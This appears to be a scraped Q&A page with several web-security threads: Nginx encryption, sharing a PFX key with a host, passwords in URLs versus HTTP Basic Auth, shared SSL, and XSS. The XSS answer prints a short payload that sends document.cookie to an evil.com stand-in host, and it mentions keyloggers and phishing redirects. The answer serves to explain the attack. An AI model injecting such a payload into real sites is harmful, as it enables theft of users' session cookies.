Asymmetric on the fly encryption with Nginx - encryption

I want to encrypt a big static file on the server with Nginx when it's serving it. I want the encryption to be done with the public key sent in the request as a header and I want this endpoint to be accessible only to specific users (if someone finds the url, he should get access denied if he's not allowed to access the file.) I want Nginx to serve these encrypted files with random access.
First question: Is it possible at all? (for the authorization part I'm all ears to know if there's any solution, my authentication and authorization is done in Django, session keys stored in postgre, but I have no idea if it's feasible to share it with nginx.) Can a lua plugin for nginx read session data from postgre (or redis) and do the authorization checks with good performance?
Second question: How?
One possible solution I though about is using different certificate files (generated with passwords by django) to serve files as https. But I have no idea if it's possible to use different certificate files dynamically generated based on URI or not and I have no idea if nginx can serve files with asymmetric encryption over https or if https protocol supports it at all even if client is a custom client other than normal browsers than can parse data whatever way needed.
Another possible solution is writing a Lua plugin for Nginx but that'd be extremely expensive solution for me considering my resources. But I'd be thankful if someone could tell me if it's possible at all even with a custom plugin or not.

Related

Sharing a Private Key with WordPress Host

We utilize an outside vendor for hosting our WordPress site. The SSL certificate will expire soon and they have requested that I send them the contents of the PFX file, unencrypted, to them via email. The PFX file contains the KEY file and the CRT file. Our SSL is a wildcard for our domain; the same key is used to protect our VPN and another web server which I manage. We do not use it to sign any code.
If I have to share this/these files, I'd much prefer to do it by way of OneDrive or Google drive, but the host service person says that emailing presents no risks since an attacker would need to get into our DNS to make use of it.
Am I justified in pushing back on this? I find it weird that they haven't even offered to send it encrypted and provide the passcode via another mechanism.
TIA

HTTP Auth vs Complex URL

Imagine I need to provide a secure endpoint with private data. Consider user1 with password1234. Is there any difference in security between:
https://website.com/myendpoint/user1/password1234
https://website.com/myendpoint with HTTP Basic Auth with credentials given above
It seems to me there is in fact no difference, but I don't have any specific/strong arguments for it.
There is indeed a significant difference. As per the best practice, you should not include any sensitive information (let alone passwords) in the url.
Reasons are the following:
Urls get logged on the server (typically to files, but other datastores might even be worse) which might allow an attacker to extract this data, think for example backups as well.
Urls might get logged and/or inspected on intermediate proxies. Consider corporate proxies with https inspection.
Urls are cached on the client and added to browser history. A script or a malicious user having gained access to a pc might extract passwords from there. Even if the intended client is programmatic, consider users who want to use your app or api from a browser for whatever reason (users are very creative :) ).
Urls might be seen on screen.
Of course not all of these apply to all usecases, but some of these you have no control over. So it's best to not include any sensitive data in your urls. Http basic over https is much better.

Xss cross-site-scripting in practise

I know xss attack usees input points of a page to insert javascript code into the page or into server db.
In both cases the javascript code will be activated soon or later on some events.
I imagine an attacker that uses a browser to put javascript code into a server db using maybe an input name.
Another client(victim) makes a request to the same server , maybe it asks for the user classific.
The attacker is in classific , so the attacker name(actually evil javascript code) is inserted in the page the victim requested.
The question is what information can the attacker steal and how?
I imagine the attacker wants to get cookies. And I imagine he wants include one his evil script with the javascript code injected.
In this way he can pass to the jsp/asp or whatever information about cookies.
So if the site is in https , it's possible to include scripts which are in http server?
I don't believe the attacker uses https server to store his scripts because it could be soon easily arrested.
Or maybe there are other ways for the attacker to get information?
I imagine the attacker wants to get cookies. And I imagine he wants include one his evil script with the javascript code injected. In this way he can pass to the jsp/asp or whatever information about cookies.
The question is what information can the attacker steal and how?
Yes, the easiest type of attack would be to steal non HttpOnly cookies.
<script>
new Image().src = 'https://www.evil.com/?' + escape(document.cookie);
</script>
Other attacks include injecting JavaScript keyloggers that send key strokes back to the attacker in a similar fashion, or redirecting the user to phishing sites or to sites containing drive by downloads.
So if the site is in https , it's possible to include scripts which are in http server? I don't believe the attacker uses https server to store his scripts because it could be soon easily arrested.
Interesting question. Yes, the site being HTTPS does not reduce the chances of an XSS flaw. They would need to host their attacking page on a HTTPS enabled web server with a certificate trusted by their victim's machine. This could either be the attackers own machine with a cheap SSL certificate paid for by BitCoin where only the domain is validated (not the organisation), it could be an already compromised machine (e.g. if the attacker already has control over another public website), or it could be a stolen certificate from another hacked site that the attacker is now using on their domain (in combination with a DNS hijack or MITM). Edit: Now it is possible to get free certs from the likes of Let's Encrypt and similar.
Little security is required to get a Domain Validated certificate:
Low assurance certificates include only your domain name in the
certificate. Certificate Authorities usually verify that you own the
domain name by checking the WHOIS record. The certificate can be
issued instantly and is cheaper but, as the name implies, these
certificates provide less assurance to your customers.
You can use a Web Application Firewall to scan and block XSS, including in cookies (though the latter can cause false positives) https://medium.com/p/5d4b1d33219a/edit
For AWS WAF refer to https://aws.amazon.com/waf/

HTTP, HTTPS, Shared SSL, and SEO

I was recently looking around at some of the features my current web host offers, and am now wondering about a few things. Even if you can only answer part of this, I appreciate any help you can provide.
I have a domain, mydomian.com, and the host offers shared SSL so I can use HTTPS by using this address https://mydomain.myhost.com. The SSL certificate is good for *.myhost.com.
I don't know a lot about SSL, but I'm assuming this means that the data between site users and ANY domain on myhost.com is encrypted. So was curious if this meant that if someone else on the same host as me somehow intercepted the data from my site would they be able to view it, since they would also have a https://theirdomain.myhost.com address, which uses the same SSL certificate? I may have no idea at all, and this was pretty much a guess.
If HTTPS is used on a login page, but after logging in the other pages are viewed over HTTP, is this a security issue?
Is there any way to show a web form via HTTP for bots like Google, but have real users redirected to the HTTPS version? Would be ideal if this could be done via .htaccess. I currently have some rewrite rules that redirect certain pages to HTTPS, but the rest as HTTP. So if a visitor visits the contact form they get the HTTPS version automatically, but it automatically switches back to HTTP for pages that don't contain forms. So, via htaccess, is there a way to direct real users to the HTTPS version, but have bots directed to the HTTP version? I would like these pages to still be indexed by the search engines, but would like users to see it via HTTPS.
Thanks in advance for any help you can provide.
I'm going to guess you'll be okay for number one. If your host does it correctly, individual subdomains never get to see the SSL keys. Here's how it would work:
Some guy with a browser sends an encrypted request to your subdomain server.
Your host's master server receives the request and decrypts it.
The master server sends the decrypted request to your subdomain server.
And any HTTPS responses you send back go through that process in reverse. It should be easy to check if they've set things up that way: If you can set up shared SSL without personally handling any key files, you're good. If you actually get your hands on some key files... not good.
For two: If you encrypt the login, you protect the passwords, which is good. But if you switch back to HTTP afterwards, you open yourself up to other attacks. See: Firesheep. There may be others.
And for three. Yes - definitely doable. Check out mod_rewrite. Can't give you an example, as I've never used this particular case, but I can point you to this page - particularly the section entitled "Browser Dependent Content."
Hope that helps!
Every traffic is encrypted, when you use https:// as protocol. (Except for some uncommon circumstances I won't talk about here). An SSL certificate's purpose is to prove the identity of the server, by combining it's public key with an identity. This certificate is only usable with the private key that belongs to the public one. In your case it seems that this certificate as well as the key-pair is provided by your hosting provider. I guess that neither you nor the other customers on the host have access to this private key. That means that only your provider is able to decrypt the traffic. Since that's always the case (he's running the server, so has access to every data), that should be no problem.
In most cases it is a security issue. On every further unencrypted http-request the client has to provide some information of the session to the server. These can be intercepted and used by an attacker. (simply speaking)
The bots should support https, why not redirect them? Anyhow: The important part is not to provide the page containing the form via https. To protect your user's data you should take care that the response is transferred via https.

Bad idea to pass username and password in the URL when using SSL?

Scenario:
I have a ASP.Net / Silverlight website with webservices for supporting the Silverlight apps with data. The website uses forms authentication, and thus the webservices can also authenticate requests.
Now I would like to pull some data from this system to a Android application. I could implement code for running the forms login, and storing the authentication cookie, but it would actually be much simpler to send the username and password in the webservice url and authenticate each call. I don't really see a big problem with this as the communication is SSL encrypted, but I'm open to be conviced otherwise ;)
What do you think ? Bad idea / not so bad idea ?
Conclusion:
After reviewing the answers the only really valid argument against name / pass in the url request string is that it's stored in the server log files. Granted it's my server and if that server is hacked the the data it stores will also be hacked, but I still don't like passwords showing up in logs. (Thats why they are stored salted and encrypted)
Solution:
I will post the username and passord with the request. Minimal extra work, and more secure.
See Are querystring parameters secure in HTTPS (HTTP + SSL)?
Everything will be encrypted, but the URLs, along with the query string (and thus the passwords) will show up in the server log files.
Bad Idea: The contents of your post are encrypted and though the URL parameters may be encrypted as well, they could still be visible to third-party trackers, server logs or some other monitoring software that can directly sniff your traffic. It is just not a good idea to open up a potential security hole in this way.
Users do tend to copy-and-paste URLs straight from their address bar into emails, blogs, etc., and save them in bookmarks, and so on.
And things like plugins, or even other software that reads, for example, window properties (alternate shells, theme managers, accessibility software) could end up with the info. And they might, for example, crash and automatically send crashdumps back to their developers.
And worms far less sophisticated than keloggers - like things that take screendumps - can get passwords this way. Sometimes even security software, for example if deployed in a corporate network.
And if the user has a local proxy, then they might be communicating in plaintext with the proxy which in turn is talking in SSL (not the way it's supposed to be done, but it happens).
And for these and more reasons, URLs with usernames and passwords, that used to be standard - such as ftp URLs with the username and password in the authority segment - are now typically forbidden by browsers.
https://www.rfc-editor.org/rfc/rfc3986#section-7.5
So, an emphatic NO, DO NOT DO THIS.
It is always good programing practice to not provide delicate info like username and password
in the URL. No matter how good a site is it can be compromised. So why provide with more info?

Resources